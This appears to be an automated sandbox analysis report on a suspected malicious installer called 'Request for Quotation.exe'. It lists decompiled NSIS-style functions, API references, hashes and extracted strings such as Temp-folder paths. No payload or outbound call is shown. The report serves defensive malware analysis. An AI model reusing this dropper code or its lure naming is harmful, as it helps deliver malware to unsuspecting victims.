                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                • String ID: F$Setup Setup
                                                                                • API String ID: 941294808-1602013819
                                                                                • Opcode ID: cd331e12ae0955bb205525083ccead6a312c2f6528c49d50c92112df1f80047c
                                                                                • Instruction ID: 0ac27d016dd37b64d299d3f81b39716040336c4aee851974846d4d7042c5b915
                                                                                • Opcode Fuzzy Hash: cd331e12ae0955bb205525083ccead6a312c2f6528c49d50c92112df1f80047c
                                                                                • Instruction Fuzzy Hash: CA419C71800249AFCF058FA5DE459AF7FB9FF44314F00802AF991AA1A0C778EA55DFA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00405EBC(void* __ecx) {
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				long _t12;
                                                                                				long _t24;
                                                                                				char* _t31;
                                                                                				int _t37;
                                                                                				void* _t38;
                                                                                				intOrPtr* _t39;
                                                                                				long _t42;
                                                                                				CHAR* _t44;
                                                                                				void* _t46;
                                                                                				void* _t48;
                                                                                				void* _t49;
                                                                                				void* _t52;
                                                                                				void* _t53;
                                                                                
                                                                                				_t38 = __ecx;
                                                                                				_t44 =  *(_t52 + 0x14);
                                                                                				 *0x42c648 = 0x4c554e;
                                                                                				if(_t44 == 0) {
                                                                                					L3:
                                                                                					_t12 = GetShortPathNameA( *(_t52 + 0x1c), 0x42ca48, 0x400);
                                                                                					if(_t12 != 0 && _t12 <= 0x400) {
                                                                                						_t37 = wsprintfA(0x42c248, "%s=%s\r\n", 0x42c648, 0x42ca48);
                                                                                						_t53 = _t52 + 0x10;
                                                                                						E004062E0(_t37, 0x400, 0x42ca48, 0x42ca48,  *((intOrPtr*)( *0x42f454 + 0x128)));
                                                                                						_t12 = E00405DE6(0x42ca48, 0xc0000000, 4);
                                                                                						_t48 = _t12;
                                                                                						 *(_t53 + 0x18) = _t48;
                                                                                						if(_t48 != 0xffffffff) {
                                                                                							_t42 = GetFileSize(_t48, 0);
                                                                                							_t6 = _t37 + 0xa; // 0xa
                                                                                							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                                                                							if(_t46 == 0 || E00405E5E(_t48, _t46, _t42) == 0) {
                                                                                								L18:
                                                                                								return CloseHandle(_t48);
                                                                                							} else {
                                                                                								if(E00405D4B(_t38, _t46, "[Rename]\r\n") != 0) {
                                                                                									_t49 = E00405D4B(_t38, _t21 + 0xa, 0x40a3f0);
                                                                                									if(_t49 == 0) {
                                                                                										_t48 =  *(_t53 + 0x18);
                                                                                										L16:
                                                                                										_t24 = _t42;
                                                                                										L17:
                                                                                										E00405DA1(_t24 + _t46, 0x42c248, _t37);
                                                                                										SetFilePointer(_t48, 0, 0, 0);
                                                                                										E00405E8D(_t48, _t46, _t42 + _t37);
                                                                                										GlobalFree(_t46);
                                                                                										goto L18;
                                                                                									}
                                                                                									_t39 = _t46 + _t42;
                                                                                									_t31 = _t39 + _t37;
                                                                                									while(_t39 > _t49) {
                                                                                										 *_t31 =  *_t39;
                                                                                										_t31 = _t31 - 1;
                                                                                										_t39 = _t39 - 1;
                                                                                									}
                                                                                									_t24 = _t49 - _t46 + 1;
                                                                                									_t48 =  *(_t53 + 0x18);
                                                                                									goto L17;
                                                                                								}
                                                                                								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                                                								_t42 = _t42 + 0xa;
                                                                                								goto L16;
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                				} else {
                                                                                					CloseHandle(E00405DE6(_t44, 0, 1));
                                                                                					_t12 = GetShortPathNameA(_t44, 0x42c648, 0x400);
                                                                                					if(_t12 != 0 && _t12 <= 0x400) {
                                                                                						goto L3;
                                                                                					}
                                                                                				}
                                                                                				return _t12;
                                                                                			}



















                                                                                0x00000000
                                                                                0x00405fb9
                                                                                0x00405f85
                                                                                0x00405f63
                                                                                0x00405ee2
                                                                                0x00405eed
                                                                                0x00405ef6
                                                                                0x00405efa
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00405efa
                                                                                0x0040602b

                                                                                APIs
                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,0040604D,?,?), ref: 00405EED
                                                                                • GetShortPathNameA.KERNEL32(?,0042C648,00000400), ref: 00405EF6
                                                                                  • Part of subcall function 00405D4B: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D5B
                                                                                  • Part of subcall function 00405D4B: lstrlenA.KERNEL32(00000000,?,00000000,00405FA6,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D8D
                                                                                • GetShortPathNameA.KERNEL32(?,0042CA48,00000400), ref: 00405F13
                                                                                • wsprintfA.USER32 ref: 00405F31
                                                                                • GetFileSize.KERNEL32(00000000,00000000,0042CA48,C0000000,00000004,0042CA48,?,?,?,?,?), ref: 00405F6C
                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F7B
                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB3
                                                                                • SetFilePointer.KERNEL32(0040A3F0,00000000,00000000,00000000,00000000,0042C248,00000000,-0000000A,0040A3F0,00000000,[Rename],00000000,00000000,00000000), ref: 00406009
                                                                                • GlobalFree.KERNEL32 ref: 0040601A
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406021
                                                                                  • Part of subcall function 00405DE6: GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\user\Desktop\Request for Quotation.exe,80000000,00000003), ref: 00405DEA
                                                                                  • Part of subcall function 00405DE6: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                • String ID: %s=%s$[Rename]
                                                                                • API String ID: 2171350718-1727408572
                                                                                • Opcode ID: aa6939ac238f388c35aac3f6ed86af9ca24a124bbe4c5df02d85bba9ad26e0ee
                                                                                • Instruction ID: 93867bad2f833244898b90dcbcfca195f0b3b673d55ab92eabf696d68ffba162
                                                                                • Opcode Fuzzy Hash: aa6939ac238f388c35aac3f6ed86af9ca24a124bbe4c5df02d85bba9ad26e0ee
                                                                                • Instruction Fuzzy Hash: 29310371640B16ABC2306B659D48F6B3A5CDF45758F14003BF942F62C2EA7CE8118AAD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 72%
                                                                                			E004062E0(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                                                                				struct _ITEMIDLIST* _v8;
                                                                                				char _v12;
                                                                                				signed int _v16;
                                                                                				signed char _v20;
                                                                                				signed int _v24;
                                                                                				signed char _v28;
                                                                                				signed int _t38;
                                                                                				CHAR* _t39;
                                                                                				signed int _t41;
                                                                                				char _t52;
                                                                                				char _t53;
                                                                                				char _t55;
                                                                                				char _t57;
                                                                                				void* _t65;
                                                                                				char* _t66;
                                                                                				signed int _t80;
                                                                                				intOrPtr _t86;
                                                                                				char _t88;
                                                                                				void* _t89;
                                                                                				CHAR* _t90;
                                                                                				void* _t92;
                                                                                				signed int _t97;
                                                                                				signed int _t99;
                                                                                				void* _t100;
                                                                                
                                                                                				_t92 = __esi;
                                                                                				_t89 = __edi;
                                                                                				_t65 = __ebx;
                                                                                				_t38 = _a8;
                                                                                				if(_t38 < 0) {
                                                                                					_t86 =  *0x42ec1c; // 0x6aacde
                                                                                					_t38 =  *(_t86 - 4 + _t38 * 4);
                                                                                				}
                                                                                				_push(_t65);
                                                                                				_push(_t92);
                                                                                				_push(_t89);
                                                                                				_t66 = _t38 +  *0x42f498;
                                                                                				_t39 = 0x42e3e0;
                                                                                				_t90 = 0x42e3e0;
                                                                                				if(_a4 >= 0x42e3e0 && _a4 - 0x42e3e0 < 0x800) {
                                                                                					_t90 = _a4;
                                                                                					_a4 = _a4 & 0x00000000;
                                                                                				}
                                                                                				while(1) {
                                                                                					_t88 =  *_t66;
                                                                                					if(_t88 == 0) {
                                                                                						break;
                                                                                					}
                                                                                					__eflags = _t90 - _t39 - 0x400;
                                                                                					if(_t90 - _t39 >= 0x400) {
                                                                                						break;
                                                                                					}
                                                                                					_t66 = _t66 + 1;
                                                                                					__eflags = _t88 - 4;
                                                                                					_a8 = _t66;
                                                                                					if(__eflags >= 0) {
                                                                                						if(__eflags != 0) {
                                                                                							 *_t90 = _t88;
                                                                                							_t90 =  &(_t90[1]);
                                                                                							__eflags = _t90;
                                                                                						} else {
                                                                                							 *_t90 =  *_t66;
                                                                                							_t90 =  &(_t90[1]);
                                                                                							_t66 = _t66 + 1;
                                                                                						}
                                                                                						continue;
                                                                                					}
                                                                                					_t41 =  *((char*)(_t66 + 1));
                                                                                					_t80 =  *_t66;
                                                                                					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f;
                                                                                					_v24 = _t80;
                                                                                					_v28 = _t80 | 0x00000080;
                                                                                					_v16 = _t41;
                                                                                					_v20 = _t41 | 0x00000080;
                                                                                					_t66 = _a8 + 2;
                                                                                					__eflags = _t88 - 2;
                                                                                					if(_t88 != 2) {
                                                                                						__eflags = _t88 - 3;
                                                                                						if(_t88 != 3) {
                                                                                							__eflags = _t88 - 1;
                                                                                							if(_t88 == 1) {
                                                                                								__eflags = (_t41 | 0xffffffff) - _t97;
                                                                                								E004062E0(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
                                                                                							}
                                                                                							L42:
                                                                                							_t90 =  &(_t90[lstrlenA(_t90)]);
                                                                                							_t39 = 0x42e3e0;
                                                                                							continue;
                                                                                						}
                                                                                						__eflags = _t97 - 0x1d;
                                                                                						if(_t97 != 0x1d) {
                                                                                							__eflags = (_t97 << 0xa) + 0x430000;
                                                                                							E0040624D(_t90, (_t97 << 0xa) + 0x430000);
                                                                                						} else {
                                                                                							E004061AB(_t90,  *0x42f448);
                                                                                						}
                                                                                						__eflags = _t97 + 0xffffffeb - 7;
                                                                                						if(_t97 + 0xffffffeb < 7) {
                                                                                							L33:
                                                                                							E00406528(_t90);
                                                                                						}
                                                                                						goto L42;
                                                                                					}
                                                                                					_t52 =  *0x42f44c;
                                                                                					__eflags = _t52;
                                                                                					_t99 = 2;
                                                                                					if(_t52 >= 0) {
                                                                                						L13:
                                                                                						_a8 = 1;
                                                                                						L14:
                                                                                						__eflags =  *0x42f4e4;
                                                                                						if( *0x42f4e4 != 0) {
                                                                                							_t99 = 4;
                                                                                						}
                                                                                						__eflags = _t80;
                                                                                						if(__eflags >= 0) {
                                                                                							__eflags = _t80 - 0x25;
                                                                                							if(_t80 != 0x25) {
                                                                                								__eflags = _t80 - 0x24;
                                                                                								if(_t80 == 0x24) {
                                                                                									GetWindowsDirectoryA(_t90, 0x400);
                                                                                									_t99 = 0;
                                                                                								}
                                                                                								while(1) {
                                                                                									__eflags = _t99;
                                                                                									if(_t99 == 0) {
                                                                                										goto L30;
                                                                                									}
                                                                                									_t53 =  *0x42f444;
                                                                                									_t99 = _t99 - 1;
                                                                                									__eflags = _t53;
                                                                                									if(_t53 == 0) {
                                                                                										L26:
                                                                                										_t55 = SHGetSpecialFolderLocation( *0x42f448,  *(_t100 + _t99 * 4 - 0x18),  &_v8);
                                                                                										__eflags = _t55;
                                                                                										if(_t55 != 0) {
                                                                                											L28:
                                                                                											 *_t90 =  *_t90 & 0x00000000;
                                                                                											__eflags =  *_t90;
                                                                                											continue;
                                                                                										}
                                                                                										__imp__SHGetPathFromIDListA(_v8, _t90);
                                                                                										_v12 = _t55;
                                                                                										__imp__CoTaskMemFree(_v8);
                                                                                										__eflags = _v12;
                                                                                										if(_v12 != 0) {
                                                                                											goto L30;
                                                                                										}
                                                                                										goto L28;
                                                                                									}
                                                                                									__eflags = _a8;
                                                                                									if(_a8 == 0) {
                                                                                										goto L26;
                                                                                									}
                                                                                									_t57 =  *_t53( *0x42f448,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90);
                                                                                									__eflags = _t57;
                                                                                									if(_t57 == 0) {
                                                                                										goto L30;
                                                                                									}
                                                                                									goto L26;
                                                                                								}
                                                                                								goto L30;
                                                                                							}
                                                                                							GetSystemDirectoryA(_t90, 0x400);
                                                                                							goto L30;
                                                                                						} else {
                                                                                							E00406134((_t80 & 0x0000003f) +  *0x42f498, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x42f498, _t90, _t80 & 0x00000040);
                                                                                							__eflags =  *_t90;
                                                                                							if( *_t90 != 0) {
                                                                                								L31:
                                                                                								__eflags = _v16 - 0x1a;
                                                                                								if(_v16 == 0x1a) {
                                                                                									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
                                                                                								}
                                                                                								goto L33;
                                                                                							}
                                                                                							E004062E0(_t66, _t90, _t99, _t90, _v16);
                                                                                							L30:
                                                                                							__eflags =  *_t90;
                                                                                							if( *_t90 == 0) {
                                                                                								goto L33;
                                                                                							}
                                                                                							goto L31;
                                                                                						}
                                                                                					}
                                                                                					__eflags = _t52 - 0x5a04;
                                                                                					if(_t52 == 0x5a04) {
                                                                                						goto L13;
                                                                                					}
                                                                                					__eflags = _v16 - 0x23;
                                                                                					if(_v16 == 0x23) {
                                                                                						goto L13;
                                                                                					}
                                                                                					__eflags = _v16 - 0x2e;
                                                                                					if(_v16 == 0x2e) {
                                                                                						goto L13;
                                                                                					} else {
                                                                                						_a8 = _a8 & 0x00000000;
                                                                                						goto L14;
                                                                                					}
                                                                                				}
                                                                                				 *_t90 =  *_t90 & 0x00000000;
                                                                                				if(_a4 == 0) {
                                                                                					return _t39;
                                                                                				}
                                                                                				return E0040624D(_a4, _t39);
                                                                                			}




























                                                                                APIs
                                                                                • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 0040640B
                                                                                • GetWindowsDirectoryA.KERNEL32(Call,00000400,?,0042A098,00000000,004053AC,0042A098,00000000), ref: 0040641E
                                                                                • SHGetSpecialFolderLocation.SHELL32(004053AC,00000000,?,0042A098,00000000,004053AC,0042A098,00000000), ref: 0040645A
                                                                                • SHGetPathFromIDListA.SHELL32(00000000,Call), ref: 00406468
                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00406474
                                                                                • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406498
                                                                                • lstrlenA.KERNEL32(Call,?,0042A098,00000000,004053AC,0042A098,00000000,00000000,00000000,00000000), ref: 004064EA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                • API String ID: 717251189-1230650788
                                                                                • Opcode ID: 116f694ca47b2294ea13ab99a6c6e8b5a49a04805e258c6f634d98d242d16d5f
                                                                                • Instruction ID: cb9956cf134697f00dd0045f5d81f520e4bdc76bf78ec342c260f9164b19bc27
                                                                                • Opcode Fuzzy Hash: 116f694ca47b2294ea13ab99a6c6e8b5a49a04805e258c6f634d98d242d16d5f
                                                                                • Instruction Fuzzy Hash: 5F611571A00104AEEB219F64DD85BBE3BA4AB15314F56413FE903B62D1D37C89A2CB5E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00406528(CHAR* _a4) {
                                                                                				char _t5;
                                                                                				char _t7;
                                                                                				char* _t15;
                                                                                				char* _t16;
                                                                                				CHAR* _t17;
                                                                                
                                                                                				_t17 = _a4;
                                                                                				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
                                                                                					_t17 =  &(_t17[4]);
                                                                                				}
                                                                                				if( *_t17 != 0 && E00405C52(_t17) != 0) {
                                                                                					_t17 =  &(_t17[2]);
                                                                                				}
                                                                                				_t5 =  *_t17;
                                                                                				_t15 = _t17;
                                                                                				_t16 = _t17;
                                                                                				if(_t5 != 0) {
                                                                                					do {
                                                                                						if(_t5 > 0x1f &&  *((char*)(E00405C10("*?|<>/\":", _t5))) == 0) {
                                                                                							E00405DA1(_t16, _t17, CharNextA(_t17) - _t17);
                                                                                							_t16 = CharNextA(_t16);
                                                                                						}
                                                                                						_t17 = CharNextA(_t17);
                                                                                						_t5 =  *_t17;
                                                                                					} while (_t5 != 0);
                                                                                				}
                                                                                				 *_t16 =  *_t16 & 0x00000000;
                                                                                				while(1) {
                                                                                					_t16 = CharPrevA(_t15, _t16);
                                                                                					_t7 =  *_t16;
                                                                                					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                                                						break;
                                                                                					}
                                                                                					 *_t16 =  *_t16 & 0x00000000;
                                                                                					if(_t15 < _t16) {
                                                                                						continue;
                                                                                					}
                                                                                					break;
                                                                                				}
                                                                                				return _t7;
                                                                                			}









                                                                                APIs
                                                                                • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Request for Quotation.exe" ,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00406580
                                                                                • CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040658D
                                                                                • CharNextA.USER32(?,"C:\Users\user\Desktop\Request for Quotation.exe" ,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00406592
                                                                                • CharPrevA.USER32(?,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 004065A2
                                                                                Strings
                                                                                • *?|<>/":, xrefs: 00406570
                                                                                • "C:\Users\user\Desktop\Request for Quotation.exe" , xrefs: 00406564
                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00406529
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Char$Next$Prev
                                                                                • String ID: "C:\Users\user\Desktop\Request for Quotation.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                • API String ID: 589700163-1663863929
                                                                                • Opcode ID: 6624216dd93989c3e415f19addad0263e6dff954d131d517deda7fd7c47402c7
                                                                                • Instruction ID: 84dc9c54e44743018b56ada6ed00289937fbd1a3950c851798eb23a5f2cb525a
                                                                                • Opcode Fuzzy Hash: 6624216dd93989c3e415f19addad0263e6dff954d131d517deda7fd7c47402c7
                                                                                • Instruction Fuzzy Hash: CA1108514047A13AFB3216286C45B777F894F97754F1904BFE8C6722C6C67C5CA2827D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00404338(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                                                				struct tagLOGBRUSH _v16;
                                                                                				long _t39;
                                                                                				long _t41;
                                                                                				void* _t44;
                                                                                				signed char _t50;
                                                                                				long* _t54;
                                                                                
                                                                                				if(_a4 + 0xfffffecd > 5) {
                                                                                					L18:
                                                                                					return 0;
                                                                                				}
                                                                                				_t54 = GetWindowLongA(_a12, 0xffffffeb);
                                                                                				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                                                                					goto L18;
                                                                                				} else {
                                                                                					_t50 = _t54[5];
                                                                                					if((_t50 & 0xffffffe0) != 0) {
                                                                                						goto L18;
                                                                                					}
                                                                                					_t39 =  *_t54;
                                                                                					if((_t50 & 0x00000002) != 0) {
                                                                                						_t39 = GetSysColor(_t39);
                                                                                					}
                                                                                					if((_t54[5] & 0x00000001) != 0) {
                                                                                						SetTextColor(_a8, _t39);
                                                                                					}
                                                                                					SetBkMode(_a8, _t54[4]);
                                                                                					_t41 = _t54[1];
                                                                                					_v16.lbColor = _t41;
                                                                                					if((_t54[5] & 0x00000008) != 0) {
                                                                                						_t41 = GetSysColor(_t41);
                                                                                						_v16.lbColor = _t41;
                                                                                					}
                                                                                					if((_t54[5] & 0x00000004) != 0) {
                                                                                						SetBkColor(_a8, _t41);
                                                                                					}
                                                                                					if((_t54[5] & 0x00000010) != 0) {
                                                                                						_v16.lbStyle = _t54[2];
                                                                                						_t44 = _t54[3];
                                                                                						if(_t44 != 0) {
                                                                                							DeleteObject(_t44);
                                                                                						}
                                                                                						_t54[3] = CreateBrushIndirect( &_v16);
                                                                                					}
                                                                                					return _t54[3];
                                                                                				}
                                                                                			}










                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.642351925.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.642341918.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642363195.0000000000408000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642372741.000000000040A000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642405848.000000000041D000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642426353.000000000042C000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642443972.0000000000435000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.642456295.0000000000438000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                • String ID:
                                                                                • API String ID: 2320649405-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 77%
                                                                                			E6F7124D8(intOrPtr* _a4) {
                                                                                				char _v80;
                                                                                				int _v84;
                                                                                				intOrPtr _v88;
                                                                                				short _v92;
                                                                                				intOrPtr* _t28;
                                                                                				void* _t30;
                                                                                				intOrPtr _t31;
                                                                                				signed int _t43;
                                                                                				void* _t44;
                                                                                				intOrPtr _t45;
                                                                                				void* _t48;
                                                                                
                                                                                				_t44 = E6F711215();
                                                                                				_t28 = _a4;
                                                                                				_t45 =  *((intOrPtr*)(_t28 + 0x814));
                                                                                				_v88 = _t45;
                                                                                				_t48 = (_t45 + 0x41 << 5) + _t28;
                                                                                				do {
                                                                                					if( *((intOrPtr*)(_t48 - 4)) >= 0) {
                                                                                					}
                                                                                					_t43 =  *(_t48 - 8) & 0x000000ff;
                                                                                					if(_t43 <= 7) {
                                                                                						switch( *((intOrPtr*)(_t43 * 4 +  &M6F712626))) {
                                                                                							case 0:
                                                                                								 *_t44 = 0;
                                                                                								goto L17;
                                                                                							case 1:
                                                                                								__eax =  *__eax;
                                                                                								if(__ecx > __ebx) {
                                                                                									_v84 = __ecx;
                                                                                									__ecx =  *(0x6f71307c + __edx * 4);
                                                                                									__edx = _v84;
                                                                                									__ecx = __ecx * __edx;
                                                                                									asm("sbb edx, edx");
                                                                                									__edx = __edx & __ecx;
                                                                                									__eax = __eax &  *(0x6f71309c + __edx * 4);
                                                                                								}
                                                                                								_push(__eax);
                                                                                								goto L15;
                                                                                							case 2:
                                                                                								__eax = E6F711429(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
                                                                                								goto L16;
                                                                                							case 3:
                                                                                								__eax = lstrcpynA(__edi,  *__eax,  *0x6f71405c);
                                                                                								goto L17;
                                                                                							case 4:
                                                                                								__ecx =  *0x6f71405c;
                                                                                								__edx = __ecx - 1;
                                                                                								__eax = WideCharToMultiByte(__ebx, __ebx,  *__eax, __ecx, __edi, __edx, __ebx, __ebx);
                                                                                								__eax =  *0x6f71405c;
                                                                                								 *((char*)(__eax + __edi - 1)) = __bl;
                                                                                								goto L17;
                                                                                							case 5:
                                                                                								__ecx =  &_v80;
                                                                                								_push(0x27);
                                                                                								_push(__ecx);
                                                                                								_push( *__eax);
                                                                                								__imp__StringFromGUID2();
                                                                                								__eax =  &_v92;
                                                                                								__eax = WideCharToMultiByte(__ebx, __ebx,  &_v92,  &_v92, __edi,  *0x6f71405c, __ebx, __ebx);
                                                                                								goto L17;
                                                                                							case 6:
                                                                                								_push( *__esi);
                                                                                								L15:
                                                                                								__eax = wsprintfA(__edi, 0x6f714000);
                                                                                								L16:
                                                                                								__esp = __esp + 0xc;
                                                                                								goto L17;
                                                                                						}
                                                                                					}
                                                                                					L17:
                                                                                					_t30 =  *(_t48 + 0x14);
                                                                                					if(_t30 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t48 - 4)) > 0)) {
                                                                                						GlobalFree(_t30);
                                                                                					}
                                                                                					_t31 =  *((intOrPtr*)(_t48 + 0xc));
                                                                                					if(_t31 != 0) {
                                                                                						if(_t31 != 0xffffffff) {
                                                                                							if(_t31 > 0) {
                                                                                								E6F7112D1(_t31 - 1, _t44);
                                                                                								goto L26;
                                                                                							}
                                                                                						} else {
                                                                                							E6F711266(_t44);
                                                                                							L26:
                                                                                						}
                                                                                					}
                                                                                					_v88 = _v88 - 1;
                                                                                					_t48 = _t48 - 0x20;
                                                                                				} while (_v88 >= 0);
                                                                                				return GlobalFree(_t44);
                                                                                			}















                                                                                APIs
                                                                                  • Part of subcall function 6F711215: GlobalAlloc.KERNELBASE(00000040,6F711233,?,6F7112CF,-6F71404B,6F7111AB,-000000A0), ref: 6F71121D
                                                                                • GlobalFree.KERNEL32 ref: 6F7125DE
                                                                                • GlobalFree.KERNEL32 ref: 6F712618
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.644261390.000000006F711000.00000020.00020000.sdmp, Offset: 6F710000, based on PE: true
                                                                                • Associated: 00000000.00000002.644238585.000000006F710000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.644270262.000000006F713000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.644290951.000000006F715000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Global$Free$Alloc
                                                                                • String ID:
                                                                                • API String ID: 1780285237-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00405374(CHAR* _a4, CHAR* _a8) {
                                                                                				struct HWND__* _v8;
                                                                                				signed int _v12;
                                                                                				CHAR* _v32;
                                                                                				long _v44;
                                                                                				int _v48;
                                                                                				void* _v52;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				CHAR* _t26;
                                                                                				signed int _t27;
                                                                                				CHAR* _t28;
                                                                                				long _t29;
                                                                                				signed int _t39;
                                                                                
                                                                                				_t26 =  *0x42ec24; // 0x0
                                                                                				_v8 = _t26;
                                                                                				if(_t26 != 0) {
                                                                                					_t27 =  *0x42f514;
                                                                                					_v12 = _t27;
                                                                                					_t39 = _t27 & 0x00000001;
                                                                                					if(_t39 == 0) {
                                                                                						E004062E0(0, _t39, 0x42a098, 0x42a098, _a4);
                                                                                					}
                                                                                					_t26 = lstrlenA(0x42a098);
                                                                                					_a4 = _t26;
                                                                                					if(_a8 == 0) {
                                                                                						L6:
                                                                                						if((_v12 & 0x00000004) == 0) {
                                                                                							_t26 = SetWindowTextA( *0x42ec08, 0x42a098);
                                                                                						}
